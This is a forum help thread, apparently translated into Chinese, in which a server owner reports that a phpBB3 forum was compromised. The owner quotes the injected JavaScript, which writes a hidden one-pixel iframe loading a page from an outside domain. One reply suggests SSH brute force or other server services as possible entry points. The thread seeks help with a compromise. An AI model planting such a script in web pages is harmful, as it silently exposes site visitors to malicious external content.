可能重复:
我的服务器被黑了 紧急求助
我的服务器被攻击了吗?
我的 Apache 服务器遭到了攻击,安装的 PHPbb3 论坛中有多个文件被修改以显示 iFrame。攻击插入了一个 php 变量和值,然后将其解码为 javascript,命令客户端加载带有外部内容的 iFrame。我的 HEADER.html(用于 Apache 目录浏览的标头)文件也遭到了修改,其他文件也可能遭到了修改。
注入的 php 中使用的变量名称是“$somecrainsignvar”。我在网上发现了类似的攻击。我知道也许 forumn 软件已经过时,存在潜在的安全漏洞,或者服务器上的其他部分可能存在潜在漏洞,但是所有对服务器的访问都通过 htpasswd/htaccess 进行限制,因此我不明白攻击者/机器人如何能够进行任何更改甚至访问该网站。
任何帮助都将不胜感激。附件是通过 php 注入的 javascript 代码。
<script type="text/javascript">document.writeln("<body>");var el = document.createElement("iframe");document.body.appendChild(el);el.id = 'myname';el.name = 'myname';el.style.width = "1px";el.style.height ="1px";el.scrolling="auto";el.frameBorder="0";el.src = "http://farenta.in/gb/us.php";</script>
答案1
此服务器上是否还有其他网站在运行?哪些帐户有权限写入 Web 服务器文件?这是专用服务器还是与其他用户共享?
有很多方法可以做到这一点,其中许多方法根本不涉及网站。例如,很容易猜到/暴力破解 SSH 密码。查看一些 Google 搜索结果询问“$somecrainsignvar”,它看起来并不是 phpBB 或 wordpress 所特有的,因此很可能是您的 Web 服务器本身或服务器上运行的其他服务存在漏洞,允许其他人直接写入文件。